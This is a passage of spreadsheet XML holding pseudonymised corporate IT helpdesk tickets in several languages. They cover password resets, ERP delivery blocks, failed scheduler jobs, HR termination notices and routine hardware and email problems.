  </r>
  <r>
    <s v="probleme mit kamera und monitor ."/>
    <s v="guten morgen dhthykts,_x000a__x000a_um die kamera an den neuen monitor anzuschlieÃŸen benÃ¶tigen wir ein kabel von hdmi auf diesen hellgrauen anschluss am dell monitor. so ist zumindest die erste kamera aufgebaut. falls es andere alternativen gibt sind wir natÃ¼rlich auch dafÃ¼r offen._x000a__x000a_"/>
    <s v="vrfpyjwi nzhvgqiw"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000a__x000a_what order number? 36154414_x000a__x000a_what material or item number?  6604042 item 1300_x000a__x000a_what warehouse location? plant_263_x000a__x000a_issue description / error message?_x000a__x000a_it is legal control issue, material was extended to plant plant_263 by rqfhiong zkwfqagb team, but legal control group isn't  extend automatically also, it is fert product and for poland (like for all eu) it should be set like ear99,_x000a_we have the same problem with all new materials extended to plant plant_263 and country pl(the same issue with czech republic- plant_254 and turkey- plant_163),_x000a__x000a_all materials have to be released manually by import/export managers (rlhuwmve krcfhoxj, slrgconp onukdesq, chrsddiwds dwdbertfsych),_x000a_the manually process take a lot times export team and csrs every day, and very often block invoicing and sales(tools after tests_n_demonstrations, consigment stocks),_x000a__x000a_material #6604042 is only example and will be relased manually by petqkjra, but please check the problem, find root cause and solve it, _x000a__x000a_"/>
    <s v="qnstifeb hybrjfex"/>
    <x v="5"/>
  </r>
  <r>
    <s v="probleme mit fp \rechner  bleibt hÃ¤ngen \ksxchbaf rhquvzfm"/>
    <s v="probleme mit fp \rechner  bleibt hÃ¤ngen \ksxchbaf rhquvzfm"/>
    <s v="ksxchbaf rhquvzfm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="need help in changing password in password_management_tool password manager."/>
    <s v="need help in changing password in password_management_tool password manager."/>
    <s v="wbilvncd idavhsxy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="amssm003: windows disk space utilization alert:utiliuytretion is 97%, out of 18gb currently 555 mb is available. "/>
    <s v="amssm003: windows disk space utilization alert : utiliuytretion is 97%, out of 18gb currently 555 mb is available. "/>
    <s v="bozdftwx smylqejw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp SID_34 ( erp production)."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ydvmibwn.eljtsdar@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_the  response time is of erp SID_34 ( erp production) is very slow._x000d__x000a_request you to kindly arrange to resolve it._x000d__x000a__x000d__x000a_"/>
    <s v="ydvmibwn eljtsdar"/>
    <x v="13"/>
  </r>
  <r>
    <s v="telecom_vendor_3 dongle connection issue"/>
    <s v="telecom_vendor_3 donggle connection issue_x000a_-connected to the user system using teamviewer._x000a_-uninstalled and reinstalled the telecom_vendor_3 dongle app._x000a_-checked the dongle settings._x000a_-advised the user to try and connect.no go_x000a_-user mentioned that the telecom_vendor_3 connect get connected for some time and then disconnects._x000a_-its happening since a long time_x000a_-no :"/>
    <s v="ojgfmvep zbatowgi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="wild card search for grade is not working in search by part number in distributor_tool"/>
    <s v="wild card search for grade is not working in search by part number in distributor_tool"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="20"/>
  </r>
  <r>
    <s v="reset passwords for soldfnbq uhnbsvqd using password_management_tool password reset."/>
    <s v="mein erp passwort funktioniert nicht. ich bin gesperrt."/>
    <s v="soldfnbq uhnbsvqd"/>
    <x v="16"/>
  </r>
  <r>
    <s v="access needed"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fwypxqcs.twsqoimy@gmail.com_x000d__x000a__x000d__x000a_hello ladies and gentlemen,_x000d__x000a__x000d__x000a__x000d__x000a_i need access to:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d229e3.a59c88e0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image004.jpg@01d229e3.a59c88e0]_x000d__x000a__x000d__x000a__x000d__x000a_may "/>
    <s v="fwypxqcs twsqoimy"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job Job_485 failed in job_scheduler at: 10/19/2016 02:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_485 failed in job_scheduler at: 10/19/2016 02:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pc an der EU_tool-station 21 in germany funktioniert nicht mehr."/>
    <s v="pc an der EU_tool-station 21(oder bde21) in germany funktioniert nicht mehr._x000d__x000a_anzeige schreibt festplatten fehler."/>
    <s v="rphoiduv hfbevpir"/>
    <x v="32"/>
  </r>
  <r>
    <s v="verbindung zum internet server nicht mÃ¶glich wegen administrationsrechten - "/>
    <s v="fehlermeldung in der mail,: dieser vorgang wurde wegen beschrÃ¤nkung abgebrochen. bitte wenden sie sich an den systemadministrator_x000a__x000a_kein hyperlink mÃ¶glich zu Ã¶ffnen!"/>
    <s v="usdhpatm icgmphjk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for soldfnbq uhnbsvqd using password_management_tool password reset."/>
    <s v="the"/>
    <s v="soldfnbq uhnbsvqd"/>
    <x v="16"/>
  </r>
  <r>
    <s v="erp SID_34 passowrd  "/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist to reset erp SID_34 password for user kimtc._x000a__x000a_dkklddww lqdwjdwd_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp account entsperren"/>
    <s v="bitte erp account von fygrwuna gomcekzi entsperren."/>
    <s v="tohxswej pmnlxyrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery blocked status :blocked"/>
    <s v="same issue with inc1561759. i have found another delivery status blocked items. please see the attached excel file for material numbers. _x000d__x000a_plesae change status to &quot;not blocked&quot; otherwise we cannot create delivery note."/>
    <s v="nwlhcfpa zdlfmthq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="reset passwords for fygrwuna gomcekzi using password_management_tool password reset."/>
    <s v="bitte erp kennwort zurÃ¼cksetzen."/>
    <s v="fygrwuna gomcekzi"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for fygrwuna gomcekzi using password_management_tool password reset."/>
    <s v="the"/>
    <s v="fygrwuna gomcekzi"/>
    <x v="16"/>
  </r>
  <r>
    <s v="quote required laptop bag &amp; projector adopter for dell latitude 7350"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_please give the quote for laptop bag &amp; projector adopter for my laptop dell latitude 7350._x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="kxmidsga zokivdfa"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_2584 failed in job_scheduler at: 10/19/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2584 failed in job_scheduler at: 10/19/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="verbindung zwischen drucker em98 und pc eemw8144353 kann nicht hergestellt werden"/>
    <s v="verbindung zwischen drucker em98 und pc eemw8144353 kann nicht hergestellt werden"/>
    <s v="nemzycxb xpsgkahw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="*deilvery block status* "/>
    <s v="_x000a__x000a_received from: nwlhcfpa.zdlfmthq@gmail.com_x000a__x000a_hello it team,_x000a__x000a_can you please assist to create dn for the following so# 36148274 ? we cannot create delivery. i believed this is because delivery block status has been set with &quot;blocked&quot;. need to be &quot;not  blocked.&quot;_x000a__x000a__x000a_so# 361482744_x000a_mm#_x000a_52815092_x000a_56235173_x000a_52842204_x000a__x000a_[cid:image002.png@01d22a14.9ba833d0]_x000a__x000a__x000a_[cid:image001.jpg@01d22a11.78bb30f0]_x000a__x000a_"/>
    <s v="nwlhcfpa zdlfmthq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="netzteil oder netzstecker defekt - pc wareneingang"/>
    <s v="bitte netzteil oder netzstecker am pc evhw8114354 (wareneingang) prÃ¼fen und ggf. reparieren._x000d__x000a_pc lÃ¤sst sich nur nach bewegen des steckers einschalten."/>
    <s v="ipeajlvk idmbyztf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="account locked in erp SID_34 "/>
    <s v="account locked in erp SID_34 "/>
    <s v="fhgmxnce jbwqivhc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in hub , for commstorage_product-company folder , for me it is showing access denied."/>
    <s v="in hub , for commstorage_product-company folder , for me it is showing access denied."/>
    <s v="jacgtfxo vlbeuxif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ublisodp.qydfvpgw@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_when i try to create a new mm number for items with storage location plant_62, the mm number gets created under plant_228 ,even when the storage location is specified as &quot;plant_62&quot; in the line item._x000d__x000a_pl rectify same._x000d__x000a__x000d__x000a_"/>
    <s v="ublisodp qydfvpgw"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_1967d failed in job_scheduler at: 10/19/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1967d failed in job_scheduler at: 10/19/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1967d failed in job_scheduler at: 10/19/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1967d failed in job_scheduler at: 10/19/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v=": insert to d/n no."/>
    <s v="please insert the delivery note no. in erp book"/>
    <s v="cthaborg cahbxlmr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="t/o not generated automatically for dn 8058525297"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to check dn 9169636308,the t/o can not generated, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ms office 365 pro plus french has  got corrupted please do the need full "/>
    <s v="ms office 365 pro plus french has  got corrupted please do the need full "/>
    <s v="axcbfuqo yiagubvh"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to login to windows account "/>
    <s v="unable to login to windows account "/>
    <s v="mqxkanzt xryzfhpe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my mobile phone cannot be use for skype business concall."/>
    <s v="also my initial is wrong, the right one is waitgr chdffong, sdfgwong_x000a__x000a__x000a_"/>
    <s v="jgautdmk fpurxzew"/>
    <x v="18"/>
  </r>
  <r>
    <s v="termination for lauredwwden hwffiglhkins,"/>
    <s v=" _x000a_ _x000a__x000a__x000a_a termination for  lauredwwden hwffiglhkins, 11139101, effective 10/01/2016 has been approved. _x000a__x000a__x000a__x000a_"/>
    <s v="yrwvnsxq wqlfarny"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 10/18/2016 22:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 10/18/2016 22:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 10/18/2016 22:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 10/18/2016 22:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="46"/>
  </r>
  <r>
    <s v="unable to access email"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist as my staff kmvwxdti uaoyhcep unable to open his email._x000a__x000a_computer name : aswl8912729_x000a_user : kthassi65a6_x000a__x000a_dbkdwwd wdfwsggalleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hello ,   a termination for phvwitud kvetadzo, 1113235650, effective 09/24/2016 has been approved"/>
    <s v="from:  [mailto:system@hr_tool.com] _x000a_sent: wednesday, october 19, 2016 12:52 am_x000a_to: nwfodmhc exurcwkm_x000a_subject:  the terminate action for phvwitud kvetadzo has completed._x000a__x000a_ _x000a_ _x000a_ _x000a__x000a_ hello , _x000a__x000a_a termination for phvwitud kvetadzo, 1113235650, effective 09/24/2016 has been approved. _x000a__x000a_click the link to view. _x000a_here _x000a__x000a_"/>
    <s v="nvawmlch ubyjolnc"/>
    <x v="19"/>
  </r>
  <r>
    <s v="tracking#"/>
    <s v="_x000a__x000a_received from: gkwcxzum.answkqpe@gmail.com_x000a__x000a_dear all_x000a__x000a_would you please do me a favor ?_x000a_plant_69 is on the customs audit and we are preparing the document._x000a__x000a_referring to the attached file, using /pweaver/ship-manifest, i can't extract the tracking numbers based on dns._x000a_would you please let me know if there is any way ?_x000a_can we not extract the old data ?_x000a__x000a_"/>
    <s v="gkwcxzum answkqpe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="hello    on my order below.   i have 5  drop ships that will not inwarehouse_tool they customer.  item 50, 70, 80, 100 and 110.  "/>
    <s v="from: pvjdtrya oevyhtdx [mailto:pvjdtrya.oevyhtdx@gmail.com] _x000a_sent: tuesday, october 18, 2016 9:02 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: wtykmnlg xamesrpfrop ship will not inwarehouse_tools_x000a__x000a_hello _x000a_ _x000a_on my order below.   i have 5  drop ships that will not inwarehouse_tool they customer.  item 50, 70, 80, 100 and 110.  po # 5616726510, 5616726518 and 5616720523._x000a_ _x000a_please advise._x000a_ _x000a_ _x000a_ _x000a_ _x000a_ _x000a_please update your records with my new email address:_x000a_ _x000a_pvjdtrya.oevyhtdx@gmail.com_x000a_ _x000a_zurtxjbd gaotwcfd_x000a_inside sales representative_x000a_pvjdtrya.oevyhtdx@gmail.com_x000a__x000a_"/>
    <s v="pvjdtrya oevyhtdx"/>
    <x v="12"/>
  </r>
  <r>
    <s v="termination for brthryian lsgthhuart"/>
    <s v="termination for brthryian lsgthhuart_x000a__x000a_hello , _x000a__x000a_a termination for brthryian lsgthhuart, 1115787569, effective 10/17/2016 has been approved. _x000a__x000a_click the link to view. _x000a_"/>
    <s v="lfikjasz tjbqcmvl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to sync mails on iphone 6s"/>
    <s v="unable to sync mails on iphone 6s"/>
    <s v="smhepfdn aypgzieh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="exchange with phone"/>
    <s v="_x000a__x000a_received from: kiduhltr.ofrdvnux@gmail.com_x000a__x000a_hello_x000a_please can you login again my phone to server._x000a_i changed my phone from old iphone 5s to new 6s . i want connect/get e-mails from exchange outlook on my iphone again :_x000a_iphone 6s_x000a_phone number: +_x000a_imei: _x000a__x000a_"/>
    <s v="kiduhltr ofrdvnux"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access erp "/>
    <s v="unable to access erp "/>
    <s v="ptgwfymc mchpwvgf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç”¨å‹è½¯ä»¶é—®é¢˜"/>
    <s v="æ‰“å¼€å·²å…³é—­çš„é”€å”®è®¢å•æ—¶ï¼Œæ˜¾ç¤º&quot;ä¸èƒ½åœ¨æ‰‹åŠ¨æˆ–åˆ†å¸ƒäº‹ç‰©æ–¹å¼ä¸‹åˆ›å»ºæ–°çš„é“¾æŽ¥&quot;"/>
    <s v="bwstnmjh yqumwrsk"/>
    <x v="47"/>
  </r>
  <r>
    <s v="job SID_43hoti failed in job_scheduler at: 10/18/2016 18:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_43hoti failed in job_scheduler at: 10/18/2016 18:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="termination for yhteijwf llwlfazo, 1117529567"/>
    <s v="hello , _x000a__x000a_a termination for yhteijwf llwlfazo, 1117529567, effective 10/18/2016 has been approved. _x000a__x000a_click the link to view. _x000a_here _x000a_"/>
    <s v="horeduca ogrhivnm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ticket update on inplant_870573"/>
    <s v="ticket update on inplant_870573"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="suspected spam mail"/>
    <s v="this looks like spam to me, just wanted to make someone aware._x000d__x000a__x000d__x000a_"/>
    <s v="iehdjwvt rndtlyhv"/>
    <x v="27"/>
  </r>
  <r>
    <s v="tool data site - cannot search with out security error"/>
    <s v="dwmnad macwdlmwkey - this is the error i am getting when i use any search function on _x000a__x000a_system.outofmemoryexception: exception of type 'system.outofmemoryexception' was thrown. at system.reflection.runtimeassembly.getrawbytes(runtimeassembly assembly, objecthandleonstack retrawbytes) at system.reflection.runtimeassembly.getrawbytes() at system.security.policy.hash.getrawdata() at system.security.policy.hash.generatehash(type hashtype) at system.security.policy.hash.get_sha1() at system.web.handlers.scriptresourcehandler.getassemblyinfointernal(assembly assembly) at system.web.handlers.scriptresourcehandler.getassemblyinfo(assembly assembly) at system.web.handlers.scriptresourcehandler.runtimescriptresourcehandler.getscriptresourceurlimpl(list`1 assemblyresourcelists, boolean zip) at system.web.handlers.scriptresourcehandler.runtimescriptresourcehandler.system.web.handlers.iscriptresourcehandler.getscriptresourceurl(list`1 assemblyresourcelists, boolean zip) at system.web.handlers.scriptresourcehandler.runtimescriptresourcehandler.system.web.handlers.iscriptresourcehandler.getscriptresourceurl(assembly assembly, string resourcename, cultureinfo culture, boolean zip) at system.web.ui.scriptreference.geturlfromname(scriptmanager scriptmanager, icontrol scriptmanagercontrol, boolean zip) at system.web.ui.scriptreference.geturlinternal(scriptmanager scriptmanager, boolean zip) at system.web.ui.scriptreference.geturl(scriptmanager scriptmanager, boolean zip) at system.web.ui.scriptmanager.registeruniquescripts(list`1 uniquescripts) at system.web.ui.scriptmanager.registerscripts() at system.web.ui.scriptmanager.onpageprerendercomplete(object sender, eventargs e) at system.web.ui.page.onprerendercomplete(eventargs e) at system.web.ui.page.processrequestmain(boolean includestagesbeforeasyncpoint, boolean includestagesafterasyncpoint)"/>
    <s v="ndyrowef biwecrgx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="password reset to login hub "/>
    <s v="password reset to login hub "/>
    <s v="tovracdn tjnvswrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no display on the monitor"/>
    <s v="no display on the monitor"/>
    <s v="vktxjamz whbdetvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="distribution list not updating "/>
    <s v="distribution list not updating _x000d__x000a_removed and re added it back ..waited for some time._x000d__x000a_it worked fine._x000d__x000a_issue resolved."/>
    <s v="tqpbazxm jhbkycgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="em event: critical:SID_37 the value of datafile size for perpsr3glovia,/oracle/SID_37/erpdata22/sr3glovia_6/sr3glovia.data6 is"/>
    <s v="host=HostName_221.company.com _x000d__x000a_target type=database instance _x000d__x000a_target name=SID_37 _x000d__x000a_categories=capacity _x000d__x000a_message=the value of datafile size for perpsr3glovia,/oracle/SID_37/erpdata22/sr3glovia_6/sr3glovia.data6 is 26,800 _x000d__x000a_severity=critical _x000d__x000a_event reported time=oct 18, 2016 3:00:29 pm edt _x000d__x000a_event type=metric alert _x000d__x000a_event name=me$oracle_datafile_monitor:datafile_size _x000d__x000a_"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="1"/>
  </r>
  <r>
    <s v="cannot post delivery 8058506120"/>
    <s v="cannot post delivery 9169617231.  about 153 materials were recently moved from usa warehouse to usa warehouse.  we are not able to post this delivery. get error that says this material is not maintained at plant plant_192.  plant_192 is usa alabama plant. (should have nothing to do with this).  see attached screen shots.  i am concerned that some configuration is missing to allow plant_101 to ship consignment fill up orders for this customer.  (tool flo mfg.)  these products are only to be stored in usa temporarily.  once inventory depletes, these will be shipped direct from plant_327/plant_328 plant. we cannot miss service to this customer.  please advise.  "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="supply_chain_software pw"/>
    <s v="_x000a__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000a__x000a_hello,_x000a__x000a_please reset my password for supply_chain_software (user: beyhtcykea23)_x000a__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="assign user &quot;corsthroc34&quot; to the ad ltabthrysallotcsalesman"/>
    <s v="hello, _x000a_pls assign user &quot;corsthroc34&quot; to the ad ltabthrysallotcsalesman. currently he is added to ltaballotcsalesemp but he is a sales manager. _x000a_approved by me (if it is enough as approval). _x000a__x000a_"/>
    <s v="xfdkwusj gyklresa"/>
    <x v="19"/>
  </r>
  <r>
    <s v="envoyÃ© Ã  partir de lâ€™outil capture dâ€™Ã©cran"/>
    <s v="_x000d__x000a__x000d__x000a_received from: orvsydzf.rbqtpdaz@gmail.com_x000d__x000a__x000d__x000a_&lt;_x000d__x000a_hello, &lt;_x000d__x000a_ &lt;_x000d__x000a_i haved any access to bobj, since 3 days. please could you help me.&lt;_x000d__x000a_"/>
    <s v="orvsydzf rbqtpdaz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath installation for lean event "/>
    <s v="' i m not able to &quot;add a lean event&quot; through &quot;the webpage cannot be displayed&quot;"/>
    <s v="xernsfqa uzvsnlbd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1967d failed in job_scheduler at: 10/18/2016 14:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1967d failed in job_scheduler at: 10/18/2016 14:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="unable to load outlook as ost file got corrupted"/>
    <s v="unable to load outlook as ost file got corrupted_x000a__x000a_name:bthrob knrlepglper_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xziwkgeo.gdiraveu@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:could you please take control of my screen and let me know what is wrong with my email? "/>
    <s v="xziwkgeo gdiraveu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_870499"/>
    <s v="ticket update on inplant_870499"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="finance portal on the hub"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qfcxbpht.oiykfzlr@gmail.com_x000d__x000a__x000d__x000a_company help,_x000d__x000a__x000d__x000a_i was unable to access the finance portal on the hub, even though i have done this in the past, receiving the below message.  could you please check my permissions and let me know what i need to do to reinstate?_x000d__x000a__x000d__x000a_               "/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="15"/>
  </r>
  <r>
    <s v="unable to access drawings "/>
    <s v="unable to access drawings "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on inplant_868966"/>
    <s v="update on inplant_868966"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: south amerirtca site is hard down since  12:54 pm et on 10/18."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________12:54 pm et on 10/18.____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __no____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____no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i don't receive any team workflows anymore into my erp inbox."/>
    <s v="von: ydigzqbu xdgjizek _x000a_gesendet: dienstag, 18. oktober 2016 10:07_x000a_an: ujxvrlzg pkaegicn_x000a_betreff: workflow inbox_x000a__x000a_hello mr. thetadkg,_x000a__x000a_i hope you are the right person to turn to:_x000a_suddenly i don't reeive any team workflows anymore into my erp inbox._x000a_i am assigned to csd 51111936 and hope you can tackle this problem._x000a_"/>
    <s v="ydigzqbu xdgjizek"/>
    <x v="12"/>
  </r>
  <r>
    <s v="vip 2 // mobile device activation"/>
    <s v="vip 2 // mobile device activation"/>
    <s v="jcsmxrgl ibhsnket"/>
    <x v="0"/>
  </r>
  <r>
    <s v="oulook not updating "/>
    <s v="_x000a_summary:my email is not update again"/>
    <s v="gzhjstxr mdnsfipg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex is not responding"/>
    <s v="hello,_x000d__x000a_i have used several times in the past, but for some reason today it's not functioning properly.  i get to the point where i have chosen which table to load and then it freezes and says not responding.  i really need this to be working properly so that i can do my job.  please help, "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="8"/>
  </r>
  <r>
    <s v="need access to sharepont approved by blktuiae jzakfmhw please find attachment"/>
    <s v="need access to collaboration_platform approved by blktuiae jzakfmhw please find attachment_x000a_user  id : schddklnes,_x000a_ website- {fc868d04-e4f5-45cb-a7b8-f33b0cc5e486}&amp;file=emea%20dpo%20vendor%20payment%20terms%20-%20change%20log.xlsx&amp;action=default_x000a__x000a_"/>
    <s v="tigwlquj evynjiar"/>
    <x v="15"/>
  </r>
  <r>
    <s v="i need my password in SID_1 changed..  thanks"/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_userid walddkrrm234_x000a__x000a_mdiwjd wthaldlmdsrop_x000a_global ethics and compliance programdntys_x000a__x000a__x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype "/>
    <s v="_x000d__x000a__x000d__x000a_received from: eqxyvfpi.gbaljypo@gmail.com_x000d__x000a__x000d__x000a_hi â€“ i have been unable to load my picture in skype â€“ when i try to edit, it takes me to my account and does not load â€“_x000d__x000a_i have added in outlook, but does not show up in skype â€“_x000d__x000a_any ideas? â€“_x000d__x000a_"/>
    <s v="eqxyvfpi gbaljypo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer issue : hp office jet printer offline."/>
    <s v="not able to clear printer queue_x000d__x000a_cleared queue by command prompt and checked giving a uacyltoe hxgaycze print, it worked fine._x000d__x000a_issue resolved."/>
    <s v="dijxefrq nbgykjpr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze call from benethrytte cthoursook"/>
    <s v="uacyltoe hxgaycze call from benethrytte cthoursook"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="expense report submittal : refer ticket # : inplant_855783"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ytqhfmwi.itnakpmc@gmail.com_x000d__x000a__x000d__x000a_i've attempted to submit this expense report (below) for approval and it does not appear to be moving on to approver, it only saves the report._x000d__x000a__x000d__x000a_this happens every time i submit an expense report._x000d__x000a__x000d__x000a_"/>
    <s v="ytqhfmwi itnakpmc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bplnyedg vobluewg placed a uacyltoe hxgaycze call : id :  1064871377"/>
    <s v="bplnyedg vobluewg placed a uacyltoe hxgaycze call : id :  1064871377"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my email keeps disconnecting and i have not had internet access at all this week. "/>
    <s v="from: wjslkzfr jxlbzwrp _x000a_sent: tuesday, october 18, 2016 5:59 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject:  - re: email and internet browser _x000a_importance: high_x000a__x000a_hello, _x000a__x000a_please help me._x000a_my email keeps disconnecting and i have not had internet access at all this week. _x000a__x000a_"/>
    <s v="wjslkzfr jxlbzwrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no access to appreciatehub"/>
    <s v="i have no access to appreciatehub.com. it says &quot;you may not yet be authorized to enter employee recognition site. please contact your admin...&quot;"/>
    <s v="asktjmqe yfwbzleo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ghost call with interaction id-1064870877"/>
    <s v="ghost call with interaction id-1064870877"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // call came and got disconnected"/>
    <s v="blank call // call came and got disconnected"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="id : 1064870825"/>
    <s v="id : 2175981936_x000d__x000a__x000d__x000a_person on other side disconnected "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not updating"/>
    <s v="outlook not updating"/>
    <s v="gzhjstxr mdnsfipg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with kpm time keeping and e-time"/>
